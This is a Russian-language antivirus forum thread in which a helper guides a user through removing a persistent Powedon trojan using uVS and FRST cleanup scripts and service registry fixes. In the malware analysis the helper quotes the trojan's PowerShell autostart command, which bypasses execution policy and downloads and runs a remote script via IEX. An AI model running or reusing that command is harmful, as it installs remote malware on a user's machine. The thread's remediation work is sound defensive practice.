Перейти к содержанию
Правила раздела
Задай вопрос Павлу Вострикову, эксперту по Kaspersky Security Center
20 лет клубу! Куда отправится Kaspersky Club? Нажми, чтобы узнать локацию! ;)

[РЕШЕНО] Не удаляется троян после лечения: HEUR:Trojan.Multi.Powedon.d

mrolya

Автор mrolya
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

mrolya

mrolya

Опубликовано
Опубликовано

Не удаляется троян HEUR:Trojan.Multi.Powedon.d, касперский находит его, делает лечение и ребутает комп, после ребута запускает сканирование и троян снова появляется, в общем все идет по кругу.
 

photo_2025-04-21_11-45-36.jpg

CollectionLog-2025.04.21-11.37.zip

safety

safety

Опубликовано
Опубликовано (изменено)

По скрину - это результат сканирования в KVRT?

Добавьте, пожалуйста, файлы отчетов о проверке из папки Reports.

+

Создайте дополнительно образ автозапуска в uVS:

 

1. Скачайте архив с актуальной версией утилиты uVS c зеркала программы отсюда (1) (здесь дополнительно встроен архиватор 7zip), распакуйте данный архив с программой в отдельный каталог.
2. запустите из каталога с модулями uVS файл Start.exe
(для Vista, W7- W11 выберите запуск от имени Администратора)
3. В стартовом окне программы - нажать "запустить под текущим пользователем". (если текущий пользователь с правами локального администратора)

4. Далее, меню "Файл" / Сохранить Полный образ автозапуска.

5. Дождитесь, пока процесс создания файла образа завершится.
Сохраненный файл образа автозапуска (с именем Ваш_компьютер_дата_время*.txt) автоматически добавится в архив 7z. (если используется uVS из зеркала со встроенным архиватором 7z)
6. Файл архива с образом автозапуска прикрепите к вашему сообщению на форуме.

Изменено пользователем safety
safety

safety

Опубликовано
Опубликовано

По очистке системы в uVS

Выполните скрипт очистки в uVS

Выполните в uVS скрипт из буфера обмена.

ЗАпускаем start,exe от имени Администратора (если не запущен)

текущий пользователь,

Копируем скрипт ниже из браузера в буфер обмена. Закрываем браузер.

В главном меню uVS выбираем: "Скрипт - выполнить скрипт из буфера обмена"

Скрипт автоматически очистит систему и завершит работу с перезагрузкой системы. 

;uVS v4.99.12v x64 [http://dsrt.dyndns.org:8888]
;Target OS: NTv11.0
v400c
OFFSGNSAVE
hide E:\AUTOLOGGER\RSIT\RSITX64.EXE
;------------------------autoscript---------------------------

delref 103.209.38.132:81
delref %SystemDrive%\USERS\WHIMP\APPDATA\LOCAL\MICROSOFT\EDGE\USER DATA\DEFAULT\EXTENSIONS\HNDFJOGDCEACHKBGIOGLEHONPEJCDHEM\10.44_0\SAVEFROM.NET ПОМОЩНИК
delall %SystemDrive%\USERS\WHIMP\SYSTEMROOTDOC\TOPAZSERV.EXE
delref HTTPS://WWW.REVI.CC/
delall %SystemDrive%\USERS\WHIMP\APPDATA\LOCAL\TEMP\{C924FBB4-E1F6-4B8F-8922-975E79EBD728}\F4AABD8C-914B-43E5-8BD4-A9200EFE3DE9.CMD
delall %SystemDrive%\USERS\WHIMP\APPDATA\LOCAL\TEMP\{D681DCD4-D8C1-47AC-AA47-3272352137A2}\8295E8EF-82CA-4985-918B-E89A7D63D98E.CMD
apply

regt 27
; Bonjour
exec MsiExec.exe /X{56DDDFB8-7F79-4480-89D5-25E1F52AB28F} /quiet

deltmp
delref %SystemDrive%\PROGRAM FILES\NVIDIA CORPORATION\NVCONTAINER\NVCONTAINERTELEMETRYAPI.DLL
delref {E984D939-0E00-4DD9-AC3A-7ACA04745521}\[CLSID]
delref {61F77D5E-AFE9-400B-A5E6-E9E80FC8E601}\[CLSID]
delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\DEFAULT-BROWSER-AGENT.EXE
delref %SystemRoot%\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORSEC.DLL
delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID]
delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID]
delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID]
delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID]
delref {88D969C0-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C1-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C2-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C3-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C4-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C5-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {8AD9C840-044E-11D1-B3E9-00805F499D93}\[CLSID]
delref {CA8A9780-280D-11CF-A24D-444553540000}\[CLSID]
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID]
delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID]
delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\UNINSTALL\HELPER.EXE
delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\FIREFOX.EXE
delref {0F8604A5-4ECE-4DE1-BA7D-CF10F8AA4F48}\[CLSID]
delref {E6FB5E20-DE35-11CF-9C87-00AA005127ED}\[CLSID]
delref %SystemDrive%\USERS\WHIMP\APPDATA\LOCAL\MICROSOFT\ONEDRIVE\24.196.0929.0005\FILESYNCSHELL64.DLL
delref %SystemDrive%\USERS\WHIMP\APPDATA\LOCAL\MICROSOFT\ONEDRIVE\24.196.0929.0005\I386\FILESYNCSHELL.DLL
delref {09A47860-11B0-4DA5-AFA5-26D86198A780}\[CLSID]
delref %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V2.0.50727\MSCORSEC.DLL
delref F:\COD\CALL OF DUTY\CONTENT\RANDGRID.SYS
delref E:\CLIENTSERVICE\HORIZON_CLIENT_SERVICE.EXE
delref %SystemDrive%\KVRT2020_DATA\TEMP\7C924DD4D20055C80007791130E2D03F\KLUPD_3A966E41A_ARKMON.SYS
delref %SystemDrive%\PROGRAM FILES\GOOGLE\CHROME\APPLICATION\130.0.6723.92\RESOURCES\WEB_STORE\ИНТЕРНЕТ-МАГАЗИН CHROME
delref %SystemDrive%\PROGRAM FILES\GOOGLE\CHROME\APPLICATION\130.0.6723.92\RESOURCES\PDF\CHROME PDF VIEWER
delref %SystemDrive%\PROGRAM FILES\GOOGLE\CHROME\APPLICATION\130.0.6723.92\RESOURCES\NETWORK_SPEECH_SYNTHESIS\GOOGLE NETWORK SPEECH
delref %SystemDrive%\PROGRAM FILES\GOOGLE\CHROME\APPLICATION\134.0.6998.89\RESOURCES\HANGOUT_SERVICES\GOOGLE HANGOUTS
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\130.0.2849.68\RESOURCES\WEB_STORE\ИНТЕРНЕТ-МАГАЗИН
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\130.0.2849.68\RESOURCES\EDGE_CLIPBOARD\MICROSOFT CLIPBOARD EXTENSION
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\131.0.2903.51\RESOURCES\EDGE_SUPPRESS_CONSENT_PROMPT\SUPPRESS CONSENT PROMPT
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\130.0.2849.68\RESOURCES\MEDIA_INTERNALS_SERVICES\MEDIA INTERNALS SERVICES EXTENSION
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\130.0.2849.68\RESOURCES\MICROSOFT_WEB_STORE\MICROSOFT STORE
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\130.0.2849.68\RESOURCES\EDGE_FEEDBACK\EDGE FEEDBACK
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\130.0.2849.68\RESOURCES\MICROSOFT_VOICES\MICROSOFT VOICES
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\130.0.2849.68\RESOURCES\EDGE_PDF\MICROSOFT EDGE PDF VIEWER
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\130.0.2849.68\RESOURCES\WEBRTC_INTERNALS\WEBRTC INTERNALS EXTENSION
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\134.0.3124.51\RESOURCES\HANGOUT_SERVICES\WEBRTC EXTENSION
delref E:\CALL OF DUTY MODERN WARFARE REMASTERED\H1_SP64_SHIP.EXE
delref F:\DRAGON AGE THE VEILGUARD\DRAGON AGE THE VEILGUARD (2024)\DRAGON AGE THE VEILGUARD\DRAGON AGE THE VEILGUARD.EXE
delref F:\GHOST OF TSUSHIMA (2020-2024)\GHOST OF TSUSHIMA DIRECTOR'S CUT\GHOSTOFTSUSHIMA.EXE
delref %SystemDrive%\USERS\WHIMP\APPDATA\LOCAL\PLAY MACHINE\VKAPP.EXE
;-------------------------------------------------------------

restart

После перезагрузки системы:

Добавьте файл дата_времяlog.txt из папки откуда запускали uVS

+

добавьте новые логи FRST для контроля

safety

safety

Опубликовано
Опубликовано

По логу FRST:

 

в системе остались поврежденные системные службы, которые надо исправить, и удалить службы созданные зловредом.

 

Скачайте с данной страницы

https://download.bleepingcomputer.com/win-services/windows-11-24H2/

следующие твики для исправления поврежденных служб:

BITS;
dosvc;
UsoSvc
WaaSMedicSvc
wuauserv

 

Запускаем каждый из загруженных файлов *.reg от имени Администратора, разрешаем внести изменения в реестр

Перезагружаем систему,

 

далее,

Выполните скрипт очистки в FRST

Запускаем FRST.exe от имени Администратора (если не запущен)

Копируем скрипт из браузера в буфер обмена, браузер закрываем.

Ждем, когда будет готов к работе,

Нажимаем в FRST кнопку "исправить".

Скрипт очистит систему, и завершит работу c перезагрузкой системы

  

Start::
HKLM\...\RunOnce: [497ab384-e3ae-42df-a4f1-8b8b1fd9c432] => "C:\Users\whimp\AppData\Local\Temp\{c94797f7-657e-474f-b406-debc9aea78af}\497ab384-e3ae-42df-a4f1-8b8b1fd9c432.cmd" (Нет файла) <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\MRT: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Google: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Edge: Ограничение <==== ВНИМАНИЕ
Task: {F3E6E7ED-A196-4E44-8803-55FAB3AD4E29} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe  (Нет файла)
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ограничение <==== ВНИМАНИЕ
HKU\S-1-5-21-1242675728-528239431-1336651218-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Ограничение <==== ВНИМАНИЕ
S2 BITS_bkp; C:\WINDOWS\System32\qmgr.dll [1474560 2025-03-28] (Microsoft Windows -> Microsoft Corporation)
U2 dosvc_bkp; C:\WINDOWS\system32\dosvc.dll [98304 2024-09-06] (Microsoft Windows -> Microsoft Corporation)
S2 UsoSvc_bkp; C:\WINDOWS\system32\usosvc.dll [81920 2024-09-06] (Microsoft Windows -> Microsoft Corporation)
S3 WaaSMedicSvc_bkp; C:\WINDOWS\System32\WaaSMedicSvc.dll [94208 2024-09-06] (Microsoft Windows -> Microsoft Corporation)
S3 wuauserv_bkp; C:\WINDOWS\system32\wuaueng.dll [172984 2024-09-06] (Microsoft Windows -> Корпорация Майкрософт)
Reboot::
End::

После перезагрузки:

Добавьте файл Fixlog.txt из папки, откуда запускали FRST, в ваше сообщение

Проверяем работоспособность системы.

Напишите по результату.

mrolya

mrolya

Опубликовано
  • Автор
Опубликовано

Одну службу исправить не получилось, ошибка на скрине.
В остальном все сделал по инструкции, троян остался

photo_2025-04-21_16-19-36.jpg

photo_2025-04-21_11-45-36.jpg

Fixlog.txt

safety

safety

Опубликовано
Опубликовано (изменено)

Служба BITS не была  повреждена, по крайней мере в списке служб не было BITS_bkp, Остальные все были.

BITS_bkp => служба не найдено.

 

Так понимаю, что обнаружение в Memory продолжается.

Добавьте, пожалуйста, те два файла report*, о которых вы писали выше.

+

сделайте такой отчет:

 

Загрузите SecurityCheck by glax24 & Severnyj, https://safezone.cc/resources/security-check-by-glax24.25/ сохраните утилиту на Рабочем столе и извлеките из архива.
    Запустите из меню по щелчку правой кнопки мыши Запустить от имени администратора
    Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
    Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
    Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
    Прикрепите этот файл к своему следующему сообщению.

 

 

Изменено пользователем safety
safety

safety

Опубликовано
Опубликовано (изменено)

Посмотрите в корне диска папку KVRT_DATA, в ней должна быть папка Reports,

все файлы из папки reports добавьте в архив, и выложите архив здесь.

+

+

+

сделайте такой отчет:

 

Загрузите SecurityCheck by glax24 & Severnyj, https://safezone.cc/resources/security-check-by-glax24.25/ сохраните утилиту на Рабочем столе и извлеките из архива.
    Запустите из меню по щелчку правой кнопки мыши Запустить от имени администратора
    Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
    Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
    Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
    Прикрепите этот файл к своему следующему сообщению.

Изменено пользователем safety
safety

safety

Опубликовано
Опубликовано (изменено)

По детекту --- HEUR:Trojan.Multi.Powedon.d

 

Цитата

К данному семейству относятся объекты автозапуска, которые содержат PowerShell скрипт, скачивающий вредоносное ПО.

 

Powershell.exe действительно активен, судя по списку процессов в логах FRST и uVS.

 

image.png

 

Возможно, реакция KVRT на данную командную строку:

"wscript.exe" /E:vbscript c

которая запускается через задачу.

 

Скрипт, который запускает Powershell:

 

Цитата

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass [System.Net.WebClient]$web = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $web.OpenRead('[хттпс://asobimo.link/ubr.txt');[System.IO.StreamReader]$txt = New-Object System.IO.StreamReader -argumentList $stream;[string]$result = $txt.ReadToEnd();IEX $result; ugr;

 

Выполните в UVS

Выполните скрипт очистки в uVS

Выполните в uVS скрипт из буфера обмена.

ЗАпускаем start,exe от имени Администратора (если не запущен)

текущий пользователь,

Копируем скрипт ниже из браузера в буфер обмена. Закрываем браузер.

В главном меню uVS выбираем: "Скрипт - выполнить скрипт из буфера обмена"

Скрипт автоматически очистит систему и завершит работу с перезагрузкой системы. 

;uVS v4.99.12v x64 [http://dsrt.dyndns.org:8888]
;Target OS: NTv11.0
v400c
OFFSGNSAVE
;---------command-block---------
unload %Sys32%\WSCRIPT.EXE
deltsk %Sys32%\WSCRIPT.EXE
apply

restart

После перезагрузки системы:

Добавьте файл дата_времяlog.txt из папки откуда запускали uVS

+

Проверьте в KVRT будет ли новый детект HEUR:Trojan.Multi.Powedon.d или нет.

Изменено пользователем safety
  • Like (+1) 1
safety

safety

Опубликовано
Опубликовано (изменено)

Хорошо, если других вопросов и проблем в работе системы не осталось:

 

Выполните по возможности обновление данного ПО:

 

Malwarebytes version 4.6.17.334 v.4.6.17.334 Внимание! Скачать обновления
--------------------------- [ OtherUtilities ] ----------------------------
Приложение NVIDIA 10.0.0.535 v.10.0.0.535 Внимание! Скачать обновления
Discord v.1.0.9166 Внимание! Скачать обновления
qBittorrent v.5.0.1 Внимание! Скачать обновления
-------------------------------- [ Media ] --------------------------------
iTunes v.12.13.4.4 Внимание! Скачать обновления
^Для проверки новой версии используйте приложение Apple Software Update^
Mozilla Firefox (x64 ru) v.132.0 Внимание! Скачать обновления
^Проверьте обновления через меню Справка - О Firefox!^
 

Изменено пользователем safety
safety

safety

Опубликовано
Опубликовано

Мы были рады Вам помочь! Надеемся, что Вы остались довольны результатом. На нашем форуме также можно получить компьютерную помощь, помощь по продуктам "Лаборатории Касперкого", обсудить технологии и технику, заказать эксклюзивную сувенирную продукцию "Лаборатории Касперского" бесплатно! Форумчане ежегодно путешествуют. В числе приглашенных в ТурциюАрмениюСочиКамбоджу можете быть и Вы! Будем рады видеть Вас в наших рядах! Всегда ваш, клуб "Лаборатории Касперского".

Гость
Эта тема закрыта для публикации ответов.
 Поделиться
Перейти к списку тем

  • Похожий контент

    • Bloodii
      Trojan:MSIL/Injector.AH!MTB
      Автор Bloodii
      Через временные промежутки выскакивает обнаружение. Первый скрин долбит комп.



      HOME-PC_2026-05-04_10-04-51_v5.0.5v x64.7z
    • PK-TanBut
      kaspersky protection не работает
      Автор PK-TanBut
      Стоит kis 21.3 однако при попытке установить на оперу 119 версии, вылазит такая штука.
      Обьясните в чем траблы?

    • mkukgh
      [РЕШЕНО] Поймал MEM:Trojan.Win32.SEPEH.gen
      Автор mkukgh
      Добрый день. Каспер находит сабж, но не устраняет проблему, долго ждал после предложения лечить с перезагрузкой, но без результата, сейчас каспер находит угрозы в файлах windows\system32\winlogon.exe и svchost.exe на скриншоте, устранять или нет? файлы системный критичные, боюсь нажимать "устранить". Логи приложил. Спасибо.

      CollectionLog-2026.04.10-14.28.zip
    • BReDD
      Trojan:PowerShell/Bynoco. RR!amc
      Автор BReDD
      Подскажите плз, активатором KMS запустил майнера и этого гада (Trojan:PowerShell/Bynoco.RR!ams) на свой ПК с ОС Win 10х64. C помощью KRD вычистил зловредов, нашел кучу исключений в Windows Defender, удалил все. Так же капитально вычистил планировщик и автозапуск. Не трогал лишь службы, но там ничего криминального не заметил. Вроде все норм, проверка показывает, что ничего нет, но комп стал медленнее грузиться и значки на панели и в трее стали выходить с задержкой 3-5 минут. Чувствую, что где тоеще хвосты есть, возможно в реестре, но не могу найти. Создание нового юзера тоже ничего не дало. Есть ли средство, как убрать последствия за этим трояном?
       
      Сообщение от модератора thyrex Перенесено из темы
    • Mikhazen
      Скачал вирус "Trojan.Python.Obfus.f"
      Автор Mikhazen
      Что мне делать. Кинули ссылку и скачался файл, открыл его в Пайтон 3.14.... закинул на вирус тотал и мне Касперский кинул детект. Trojan.Python.Obfus.f . на сайте Касперского пишет такое, что обращался к именам 
       
      BSS:Trojan.Win32.Generic
       
      HEUR:Trojan-Dropper.Python.Obfus.gen
       
      Trojan.Python.Agent.og
       
      Я удалил сам текстовый файл crypted.py, но память начала грузиться до 50%, антималвэйр на цп ≈10-20 процентов кидает. Что делать? Есть ли способ без сноса винды? Т.к. там все файлы по работе
×
×
  • Создать...